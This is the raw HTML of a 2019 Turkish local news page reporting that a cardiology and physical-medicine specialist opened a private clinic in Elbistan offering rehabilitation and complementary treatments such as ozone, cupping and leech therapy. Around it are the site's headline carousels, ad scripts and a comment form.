src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/ogrenciler_hedefi_12den_vurmak_icin_yaristi.jpg" alt="Öğrenciler hedefi 12’den vurmak için yarıştı" /> Öğrenciler hedefi 12’den vurmak için yarıştı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/kahramanmaras/piazzada-indirim-yarisi-h35825.html" title="Piazza’da indirim yarışı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/08/piazzada_indirim_yarisi.jpg" alt="Piazza’da indirim yarışı" /> Piazza’da indirim yarışı</a> </div> </div></div> </div> </div> </div> </div> <div id="mainContainer" class="container center shadow" style="padding-top:15px;"> <img src="http://www.elbistaninsesi.com/images/aboneol.jpg" width="937" height="45" /><br> <br> <!-- Üst Manşet --> <div id="ustkisim" class="row"> <div id="ustmanset" class="span12"> <div class="row-fluid"> <ul class="thumbnails five"> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/unal-kurt-kardeslerimize-kene-gibi-yapismis-bir-pkk-sorunu-var-h64179.html" title="Ünal: “Kürt kardeşlerimize kene gibi yapışmış bir PKK sorunu var”" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2019/09/Ysimsiz-1_29.jpg" alt="Ünal: “Kürt kardeşlerimize kene gibi yapışmış bir PKK sorunu var”" class="pull-left" /> <div class="caption-line"><p>Ünal: “Kürt kardeşlerimize kene gibi...</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/mukrime-hatun-kulturevi-hizmete-acildi-h64173.html" title="Mükrime Hatun Kültürevi hizmete açıldı" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2019/09/Ysimsiz-1_28.jpg" alt="Mükrime Hatun Kültürevi hizmete açıldı" class="pull-left" /> <div class="caption-line"><p>Mükrime Hatun Kültürevi hizmete açıldı</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/afsin-deki-rese-onay-elbistan-sirada-h64164.html" title="Afşin&#039;deki RES’e onay, Elbistan sırada" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2019/09/Ysimsiz-1_27.jpg" alt="Afşin&#039;deki RES’e onay, Elbistan sırada" class="pull-left" /> <div class="caption-line"><p>Afşin'deki RES’e onay, Elbistan sırada</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/osbnin-haftalik-toplantisi-yapildi-h64162.html" title="OSB’nin haftalık toplantısı yapıldı" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2019/09/Ysimsiz-1_26.jpg" alt="OSB’nin haftalık toplantısı yapıldı" class="pull-left" /> <div class="caption-line"><p>OSB’nin haftalık toplantısı yapıldı</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/72-kacak-avciya-91-bin-tl-ceza-h64157.html" title="72 kaçak avcıya 91 bin TL ceza" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2019/09/Ysimsiz-1_25.jpg" alt="72 kaçak avcıya 91 bin TL ceza" class="pull-left" /> <div class="caption-line"><p>72 kaçak avcıya 91 bin...</p></div> </a> </li> </ul> </div> </div> <div class="span12 reklam reklam109"><a href="http://www.elbistaninsesi.com/banner.php?id=138" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/thumb.php?src=http://www.elbistaninsesi.com/images/banner/eldas.jpg&w=980&h=250&q=90" width="980" height="250" style="width:980px;height: 250px;border:0" alt="banner138" /></a></div> </div> <!-- MAIN --> <div class="row"> <div class="page-header-fixed style hide"> <div class="title"></div> <div class="pull-right"> <span class="scroll-link d-goto" id="yorumyaplink" style="margin-right: 15px;"><i class="halflings-icon comments"></i> Yorum Yap</span> <a class="print d-print" href="javascript:window.print()" style="margin-right: 15px;"><i class="halflings-icon print"></i> Yazdır</a> <a href="javascript:void(0);" onclick="shareFacebook(gsTitle, gsUrl);" class="d-share" rel="nofollow" style="margin-right: 15px;"><i class="halflings-icon share-alt"></i> <b>Facebook</b>'ta Paylaş</a> </div> </div> <!-- Sol Blok --> <div id="main" class="span8"> <article id="haber"> <div class="page-header clearfix"> <h1 class="title gs-title" itemprop="name">Uzman Dr. Erdinç Hatipsoylu, özel muayenehane açtı</h1> <h2 class="lead" itemprop="description"><strong> Kardiyoloji Uzmanı ve Fiziksel Tıp ve Rehabilitasyon Uzmanı Doktor Erdinç Hatipsoylu’nun hasta kabul edeceği Clinics özel muayenehane ve geleneksel tamamlayıcı tıp ünitesi düzenlenen törenle hizmete açıldı.</strong></h2> </div> <div class="row-fluid muted"> <p class="pull-left"><span itemprop="datePublished" class="tarih-degistir" data-date="2019-09-14 18:03:04" content="2019-09-14T18:03:04+02:00">14 Eylül 2019 Cumartesi 18:03</span></p> </div> <div class="row-fluid newspic"> <span> <img src="http://www.elbistaninsesi.com/images/haberler/2019/09/uzman_dr_erdinc_hatipsoylu_ozel_muayenehane_acti_h64176_d9189.jpg" alt="Uzman Dr. Erdinç Hatipsoylu, özel muayenehane açtı" itemprop="image"/> </span> </div> <div class="row-fluid page-social"> <div class="span9"> <div class="shr"> <div class="gs-share"> <a class="gs-twitter"></a> <a class="gs-facebook"></a> <a class="gs-linkedin"></a> <a class="gs-google"></a> <div class="fb-like" data-href="http://www.elbistaninsesi.com/guncel/uzman-dr-erdinc-hatipsoylu-ozel-muayenehane-acti-h64176.html" data-width="100" data-layout="button_count" data-action="like" data-show-faces="true" data-share="true"></div> </div> <div id="fb-root"></div> <script>(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/tr_TR/all.js#xfbml=1"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk'));</script> </div> </div> <div class="span3 karakterislem secilemez"> <i class="glyphicons-icon text_smaller"></i> <i class="glyphicons-icon text_bigger"></i> <i class="glyphicons-icon font"></i> <a class="print" href="javascript:window.print()"><i class="glyphicons-icon print"></i></a> </div> </div> <div id="newstext" class="row-fluid page-content"> <div class="reklam reklam132 haber"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- haber resim altı --> <ins class="adsbygoogle" style="display:inline-block;width:300px;height:250px" data-ad-client="ca-pub-5471929680897605" data-ad-slot="6876227685"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script></div> <div class="reklam reklam134 text-center"><a href="http://www.elbistaninsesi.com/banner.php?id=143" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/thumb.php?src=http://www.elbistaninsesi.com/images/banner/CREN_1.jpg&w=600&h=200&q=90" width="600" height="200" style="width:600px;height: 200px;border:0" alt="banner143" /></a></div> <div itemprop="articleBody" id="newsbody"><p class="MsoNormal"><span style="font-size: 16px;">Açılış törenine Afşin Kaymakamı Ahmet Can Pınar, Elbistan Belediye Başkanı Mehmet Gürbüz, Elbistan İlçe Emniyet Müdürü Hakan Aşık, MHP Elbistan İlçe Başkanı Ramazan Kılıç, Afşin Devlet Hastanesi Başhekimi Op. Dr. İsmail Çelik, Elbistan Ülkü Ocakları Başkanı Muhammet Kaya ve davetliler katıldı.</span><o:p></o:p></p> <p class="MsoNormal"><span style="font-size: 16px;">Uzman Dr. Hatipsoylu, Battalgazi Mahallesi Boğaziçi Sokak Özel Yaşam Hastanesi arkasında açtığı muayenehane ve geleneksel tamamlayıcı tıp ünitesi bünyesinde mezoterapi, ozonterapi, proloterapi, kupa terapi (hacamat), hirudoterapi (tıbbi sülük tedavisi) hizmeti veriyor. </span><o:p></o:p></p> <p class="MsoNormal"><span style="font-size: 16px;">İstanbul Tıp Fakültesi mezunu olan ve 2018-2019 yıllarında Afşin Devlet Hastanesi’nde Fizik Tedavi Uzmanı olarak görev yapan Hatipsoylu, Elbistan’da açtığı muayenehanesinde hasta kabulüne başladı.</span><o:p></o:p></p> <p class="MsoNormal"><span style="font-size: 16px;">Açılışa katılanlara teşekkür eden Uzman Doktor Erdinç Hatipsoylu,” Fizik tedavi ve rehabilitasyon merkezi ve geleneksel ve tamamlayıcı tıp ünitesi bünyesinde Elbistan ve bölge halkına mezoterapi, ozonterapi, proloterapi, kupa terapi (hacamat), hirudoterapi (tıbbi sülük tedavisi) hizmeti veriyoruz. Elbistan’da açtığımız muayenehanemizde hafta içi 09.00-18.00 saatleri, Cumartesi günleri ise 10.00-14.30 saatleri arasında hizmet veriyoruz. Hastalarımız tedavi olmak için artık şehir dışına gitme gereksinimi duymuyor” dedi.<br /> <img src="/images/upload/muayenehane açılış (2).JPG" width="640" height="425" alt="" /><br /> <br /> <img src="/images/upload/muayenehane açılış (3).JPG" width="640" height="425" alt="" /><br /> <br /> <img src="/images/upload/muayenehane açılış (4).JPG" width="640" height="425" alt="" /></span> <o:p></o:p></p></div> </div> <br> <div class="box ilgili"> <div class="box header black"> <a href="#"><h5 class="glyphicons fire">Yerel Manşetler</h5></a> </div> </article> <div class="hide-print"> <div id="anamanset" class="carousel hs-manset slid"> <ol class="carousel-indicators twentyfive carousel-hover"> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/mukrime-hatun-kulturevi-hizmete-acildi-h64173.html'; return false;" data-target="#anamanset" data-slide-to="0" class="active">1</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/unal-kurt-kardeslerimize-kene-gibi-yapismis-bir-pkk-sorunu-var-h64179.html'; return false;" data-target="#anamanset" data-slide-to="1" >2</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/voleybol-takim-kaptani-evin-elbistan-icin-mucadele-edecegiz-h64178.html'; return false;" data-target="#anamanset" data-slide-to="2" >3</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/polisten-standart-disi-isik-donanimi-denetimi-h64177.html'; return false;" data-target="#anamanset" data-slide-to="3" >4</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/uzman-dr-erdinc-hatipsoylu-ozel-muayenehane-acti-h64176.html'; return false;" data-target="#anamanset" data-slide-to="4" >5</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/mikrokredi-ile-kendi-isini-kurdu-h64175.html'; return false;" data-target="#anamanset" data-slide-to="5" >6</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/goksunlu-milli-guresci-dunya-sampiyonu-oldu-h64172.html'; return false;" data-target="#anamanset" data-slide-to="6" >7</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/nacar-tarim-ve-hayvancilik-can-cekisiyor-h64171.html'; return false;" data-target="#anamanset" data-slide-to="7" >8</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/afsin-deki-rese-onay-elbistan-sirada-h64164.html'; return false;" data-target="#anamanset" data-slide-to="8" >9</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistan-ulku-ocaklarindan-asure-ikrami-h64163.html'; return false;" data-target="#anamanset" data-slide-to="9" >10</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/osbnin-haftalik-toplantisi-yapildi-h64162.html'; return false;" data-target="#anamanset" data-slide-to="10" >11</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/narkotik-ekiplerinin-yakaladigi-sokak-saticisi-tutuklandi-h64161.html'; return false;" data-target="#anamanset" data-slide-to="11" >12</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/iyi-partiden-durusma-aciklamasi-h64160.html'; return false;" data-target="#anamanset" data-slide-to="12" >13</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/enes-donerden-geleneksel-asure-ikrami-h64159.html'; return false;" data-target="#anamanset" data-slide-to="13" >14</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/barodan-asure-birlikteligi-h64158.html'; return false;" data-target="#anamanset" data-slide-to="14" >15</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/72-kacak-avciya-91-bin-tl-ceza-h64157.html'; return false;" data-target="#anamanset" data-slide-to="15" >16</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/belediye-personellerinden-elbistanspora-tam-destek-h64156.html'; return false;" data-target="#anamanset" data-slide-to="16" >17</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/bahcesehir-koleji-elbistan-kampusune-gorkemli-acilis-h64155.html'; return false;" data-target="#anamanset" data-slide-to="17" >18</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/davanin-ilk-durusmasi-goruldu-h64154.html'; return false;" data-target="#anamanset" data-slide-to="18" >19</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistanspor-yeni-sezona-iddiali-sekilde-hazirlaniyor-h64153.html'; return false;" data-target="#anamanset" data-slide-to="19" >20</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/ulku-ocaklarindan-12-eylul-aciklamasi-h64152.html'; return false;" data-target="#anamanset" data-slide-to="20" >21</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/ahir-yangini-korkuttu-h64151.html'; return false;" data-target="#anamanset" data-slide-to="21" >22</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/duman-7-uygulamasinda-221-kilo-kacak-tutun-ele-gecirildi-h64150.html'; return false;" data-target="#anamanset" data-slide-to="22" >23</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistan-kaymakamligindan-salgin-iddialarina-iliskin-aciklama-h64149.html'; return false;" data-target="#anamanset" data-slide-to="23" >24</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/nobet-kulesinde-canina-kiydi-h64147.html'; return false;" data-target="#anamanset" data-slide-to="24" >25</li> </ol> <div class="carousel-inner"> <div class="item active"> <a href="http://www.elbistaninsesi.com/guncel/mukrime-hatun-kulturevi-hizmete-acildi-h64173.html" title="Mükrime Hatun Kültürevi hizmete açıldı"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/09/mukrime_hatun_kulturevi_hizmete_acildi_h64173_cfce7.jpg" alt="Mükrime Hatun Kültürevi hizmete açıldı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Mükrime Hatun Kültürevi hizmete açıldı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/unal-kurt-kardeslerimize-kene-gibi-yapismis-bir-pkk-sorunu-var-h64179.html" title="Ünal: “Kürt kardeşlerimize kene gibi yapışmış bir PKK sorunu var”"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/09/unal_kurt_kardeslerimize_kene_gibi_yapismis_bir_pkk_sorunu_var_h64179_35030.jpg" alt="Ünal: “Kürt kardeşlerimize kene gibi yapışmış bir PKK sorunu var”" /> <div class="carousel-caption"> <h2> <span style="font-size:">Ünal: “Kürt kardeşlerimize kene gibi yapışmış bir PKK sorunu var”</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/voleybol-takim-kaptani-evin-elbistan-icin-mucadele-edecegiz-h64178.html" title="Voleybol takım kaptanı Evin: “Elbistan için mücadele edeceğiz”"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/09/voleybol_takim_kaptani_evin_elbistan_icin_mucadele_edecegiz_h64178_5cefe.jpg" alt="Voleybol takım kaptanı Evin: “Elbistan için mücadele edeceğiz”" /> <div class="carousel-caption"> <h2> <span style="font-size:">Voleybol takım kaptanı Evin: “Elbistan için mücadele edeceğiz”</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/polisten-standart-disi-isik-donanimi-denetimi-h64177.html" title="Polisten standart dışı ışık donanımı denetimi"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/09/polisten_standart_disi_isik_donanimi_denetimi_h64177_3692a.jpg" alt="Polisten standart dışı ışık donanımı denetimi" /> <div class="carousel-caption"> <h2> <span style="font-size:">Polisten standart dışı ışık donanımı denetimi</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/uzman-dr-erdinc-hatipsoylu-ozel-muayenehane-acti-h64176.html" title="Uzman Dr. Erdinç Hatipsoylu, özel muayenehane açtı"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/09/uzman_dr_erdinc_hatipsoylu_ozel_muayenehane_acti_h64176_d9189.jpg" alt="Uzman Dr. Erdinç Hatipsoylu, özel muayenehane açtı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Uzman Dr. Erdinç Hatipsoylu, özel muayenehane açtı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/mikrokredi-ile-kendi-isini-kurdu-h64175.html" title="Mikrokredi ile kendi işini kurdu"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/09/mikrokredi_ile_kendi_isini_kurdu_h64175_d3941.jpg" alt="Mikrokredi ile kendi işini kurdu" /> <div class="carousel-caption"> <h2> <span style="font-size:">Mikrokredi ile kendi işini kurdu</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/goksunlu-milli-guresci-dunya-sampiyonu-oldu-h64172.html" title="Göksunlu milli güreşçi dünya şampiyonu oldu"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/09/goksunlu_milli_guresci_dunya_sampiyonu_oldu_h64172_6ebea.jpg" alt="Göksunlu milli güreşçi dünya şampiyonu oldu" /> <div class="carousel-caption"> <h2> <span style="font-size:">Göksunlu milli güreşçi dünya şampiyonu oldu</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/nacar-tarim-ve-hayvancilik-can-cekisiyor-h64171.html" title="Nacar: “Tarım ve hayvancılık can çekişiyor”"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/09/nacar_tarim_ve_hayvancilik_can_cekisiyor_h64171_30540.jpg" alt="Nacar: “Tarım ve hayvancılık can çekişiyor”" /> <div class="carousel-caption"> <h2> <span style="font-size:">Nacar: “Tarım ve hayvancılık can çekişiyor”</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/afsin-deki-rese-onay-elbistan-sirada-h64164.html" title="Afşin&#039;deki RES’e onay, Elbistan sırada"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/09/afsin_deki_rese_onay_elbistan_sirada_h64164_104f0.jpg" alt="Afşin&#039;deki RES’e onay, Elbistan sırada" /> <div class="carousel-caption"> <h2> <span style="font-size:">Afşin&#039;deki RES’e onay, Elbistan sırada</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/elbistan-ulku-ocaklarindan-asure-ikrami-h64163.html" title="Elbistan Ülkü Ocakları’ndan aşure ikramı"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/09/elbistan_ulku_ocaklarindan_asure_ikrami_h64163_a66b5.jpg" alt="Elbistan Ülkü Ocakları’ndan aşure ikramı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Elbistan Ülkü Ocakları’ndan aşure ikramı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/osbnin-haftalik-toplantisi-yapildi-h64162.html" title="OSB’nin haftalık toplantısı yapıldı"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/09/osbnin_haftalik_toplantisi_yapildi_h64162_4a088.jpg" alt="OSB’nin haftalık toplantısı yapıldı" /> <div class="carousel-caption"> <h2> <span style="font-size:">OSB’nin haftalık toplantısı yapıldı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/narkotik-ekiplerinin-yakaladigi-sokak-saticisi-tutuklandi-h64161.html" title="Narkotik ekiplerinin yakaladığı sokak satıcısı tutuklandı"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/09/narkotik_ekiplerinin_yakaladigi_sokak_saticisi_tutuklandi_h64161_7faa7.jpg" alt="Narkotik ekiplerinin yakaladığı sokak satıcısı tutuklandı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Narkotik ekiplerinin yakaladığı sokak satıcısı tutuklandı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/iyi-partiden-durusma-aciklamasi-h64160.html" title="İYİ Parti’den ‘duruşma’ açıklaması"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/09/iyi_partiden_durusma_aciklamasi_h64160_413db.jpg" alt="İYİ Parti’den ‘duruşma’ açıklaması" /> <div class="carousel-caption"> <h2> <span style="font-size:">İYİ Parti’den ‘duruşma’ açıklaması</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/enes-donerden-geleneksel-asure-ikrami-h64159.html" title="Enes Döner’den geleneksel aşure ikramı"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/09/enes_donerden_geleneksel_asure_ikrami_h64159_c59f4.jpg" alt="Enes Döner’den geleneksel aşure ikramı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Enes Döner’den geleneksel aşure ikramı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/barodan-asure-birlikteligi-h64158.html" title="Baro’dan aşure birlikteliği"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/09/barodan_asure_birlikteligi_h64158_59e74.jpg" alt="Baro’dan aşure birlikteliği" /> <div class="carousel-caption"> <h2> <span style="font-size:">Baro’dan aşure birlikteliği</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/72-kacak-avciya-91-bin-tl-ceza-h64157.html" title="72 kaçak avcıya 91 bin TL ceza"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/09/72_kacak_avciya_91_bin_tl_ceza_h64157_f5ef3.jpg" alt="72 kaçak avcıya 91 bin TL ceza" /> <div class="carousel-caption"> <h2> <span style="font-size:">72 kaçak avcıya 91 bin TL ceza</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/belediye-personellerinden-elbistanspora-tam-destek-h64156.html" title="Belediye personellerinden Elbistanspor’a tam destek"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/09/belediye_personellerinden_elbistanspora_tam_destek_h64156_be7f2.jpg" alt="Belediye personellerinden Elbistanspor’a tam destek" /> <div class="carousel-caption"> <h2> <span style="font-size:">Belediye personellerinden Elbistanspor’a tam destek</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/bahcesehir-koleji-elbistan-kampusune-gorkemli-acilis-h64155.html" title="Bahçeşehir Koleji Elbistan Kampüsü’ne görkemli açılış"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/09/bahcesehir_koleji_elbistan_kampusune_gorkemli_acilis_h64155_d3691.jpg" alt="Bahçeşehir Koleji Elbistan Kampüsü’ne görkemli açılış" /> <div class="carousel-caption"> <h2> <span style="font-size:">Bahçeşehir Koleji Elbistan Kampüsü’ne görkemli açılış</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/davanin-ilk-durusmasi-goruldu-h64154.html" title="Davanın ilk duruşması görüldü"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/09/davanin_ilk_durusmasi_goruldu_h64154_19d1a.jpg" alt="Davanın ilk duruşması görüldü" /> <div class="carousel-caption"> <h2> <span style="font-size:">Davanın ilk duruşması görüldü</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/elbistanspor-yeni-sezona-iddiali-sekilde-hazirlaniyor-h64153.html" title="Elbistanspor, yeni sezona iddialı şekilde hazırlanıyor"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/09/elbistanspor_yeni_sezona_iddiali_sekilde_hazirlaniyor_h64153_acf75.jpg" alt="Elbistanspor, yeni sezona iddialı şekilde hazırlanıyor" /> <div class="carousel-caption"> <h2> <span style="font-size:">Elbistanspor, yeni sezona iddialı şekilde hazırlanıyor</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/ulku-ocaklarindan-12-eylul-aciklamasi-h64152.html" title="Ülkü Ocakları’ndan 12 Eylül açıklaması"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/09/ulku_ocaklarindan_12_eylul_aciklamasi_h64152_b20c8.jpg" alt="Ülkü Ocakları’ndan 12 Eylül açıklaması" /> <div class="carousel-caption"> <h2> <span style="font-size:">Ülkü Ocakları’ndan 12 Eylül açıklaması</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/ahir-yangini-korkuttu-h64151.html" title="Ahır yangını korkuttu"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/09/ahir_yangini_korkuttu_h64151_60bfb.jpg" alt="Ahır yangını korkuttu" /> <div class="carousel-caption"> <h2> <span style="font-size:">Ahır yangını korkuttu</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/duman-7-uygulamasinda-221-kilo-kacak-tutun-ele-gecirildi-h64150.html" title="Duman-7 uygulamasında 221 kilo kaçak tütün ele geçirildi"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/09/duman_7_uygulamasinda_221_kilo_kacak_tutun_ele_gecirildi_h64150_30953.jpg" alt="Duman-7 uygulamasında 221 kilo kaçak tütün ele geçirildi" /> <div class="carousel-caption"> <h2> <span style="font-size:">Duman-7 uygulamasında 221 kilo kaçak tütün ele geçirildi</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/elbistan-kaymakamligindan-salgin-iddialarina-iliskin-aciklama-h64149.html" title="Elbistan Kaymakamlığı’ndan ‘salgın’ iddialarına ilişkin açıklama"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/09/elbistan_kaymakamligindan_salgin_iddialarina_iliskin_aciklama_h64149_fa507.jpg" alt="Elbistan Kaymakamlığı’ndan ‘salgın’ iddialarına ilişkin açıklama" /> <div class="carousel-caption"> <h2> <span style="font-size:">Elbistan Kaymakamlığı’ndan ‘salgın’ iddialarına ilişkin açıklama</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/nobet-kulesinde-canina-kiydi-h64147.html" title="Nöbet kulesinde canına kıydı"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/09/nobet_kulesinde_canina_kiydi_h64147_5a65d.jpg" alt="Nöbet kulesinde canına kıydı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Nöbet kulesinde canına kıydı</span> </h2> </div> </a> </div> </div> <a class="carousel-control left" href="#anamanset" data-slide="prev">&lsaquo;</a> <a class="carousel-control right" href="#anamanset" data-slide="next">&rsaquo;</a> </div> </div> <div class="row-fluid galleries"> <div class="title"> <span>İlgili Galeriler</span><hr> </div> <div class="content"> <div class="span3"> <a href="http://www.elbistaninsesi.com/elbistan-tarihi-organizeye-ev-sahipligi-yapti-resimleri,38.html" title="Elbistan, tarihi organizeye ev sahipliği yaptı"> <img src="http://www.elbistaninsesi.com/images/album/thumbs/DSC_5431.jpg" alt="Elbistan, tarihi organizeye ev sahipliği yaptı" /> <b>Elbistan, tarihi organizeye ev sahipliği yaptı</b> </a> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/donatir-mobilyadan-hediye-yagmuru-resimleri,37.html" title="Donatır Mobilya’dan hediye yağmuru"> <img src="http://www.elbistaninsesi.com/images/album/thumbs/donatYr_mobilya_cekiliY_1.jpg" alt="Donatır Mobilya’dan hediye yağmuru" /> <b>Donatır Mobilya’dan hediye yağmuru</b> </a> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/otomobilde-yanarak-can-verdiler-resimleri,36.html" title="Otomobilde yanarak can verdiler"> <img src="http://www.elbistaninsesi.com/images/album/thumbs/DSC_8860.jpg" alt="Otomobilde yanarak can verdiler" /> <b>Otomobilde yanarak can verdiler</b> </a> </div> </div> </div> <div id="yorumyap" style="margin:0"></div> <div class="row-fluid keywords"><div class="title">Anahtar Kelimeler:</div></div> <section> <div id="yorumlar"> <ul class="nav nav-tabs" id="ytab"> <li class="active"><a href="#yorumpanel" data-toggle="tab">Yorum Gönder <span class="label label-important">0</span></a></li> <li><a href="#facebookpanel" class="fbyorum" data-toggle="tab">Facebook Yorumları <span class="label label-inverse"><fb:comments-count href="http://www.elbistaninsesi.com/guncel/uzman-dr-erdinc-hatipsoylu-ozel-muayenehane-acti-h64176.html">0</fb:comments-count></span></a></li> </ul> <div class="tab-content"> <div class="tab-pane active" id="yorumpanel"> <div class="yorumlar panel"> <div id="yorumpaneli" class="row-fluid"> <form name="comment" class="comment_form" id="addcomment"> <div class="span1"> <img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/no_author.jpg" alt="Avatar" class="img-rounded"/> </div> <div class="span11"> <div class="row-fluid"> <div class="input-prepend span6"> <span class="add-on">Adınız</span> <input name="isim" class="span10 adsoyad" type="text" id="adsoyad" size="30" maxlength="50" title="Ad soyad gerekli!" /> </div> </div> <textarea name="yorum" maxlength="1000" class="span12" id="comment_field" onkeyup="textKey(this.form)" placeholder="Yorum yazmak için bu alanı kullanabilirsiniz. Yorum yazarken lütfen aşağıda yazılan uyarıları göz önünde bulundurunuz!"></textarea> <div class="span12" style="margin:0;"> <div class="answer span5" style="display:none;">Yanıt: <b>@name</b> <a href="javascript:void(0)" class="kaldir">x</a></div> <a type="button" href="javascript:void(0)" onclick="javascript:comment_send(64176);return false;" class="btn btn-warning pull-right">Yorum Gönder</a> <div class="karakter span4 pull-right">Kalan Karakter: <input name="character" id="character" disabled size="3" value="1000"></div></div> </div> <input type="hidden" name="hid" value="64176" /> <input type="hidden" name="uid" value="0" /> <input type="hidden" name="tip" value="haber" /> <input type="hidden" name="cevap" value="" class="answer" /> <input type="hidden" name="cevap_id" value="0" class="cevap_id" /> <input type="hidden" name="token" value="44f4e184c8ee787429e1d2c7dfcc320d930628e6" /> </form> </div> <div class="alert">Yorumunuz onaylanmak üzere yöneticiye iletilmiştir.<a class="close" data-dismiss="alert" 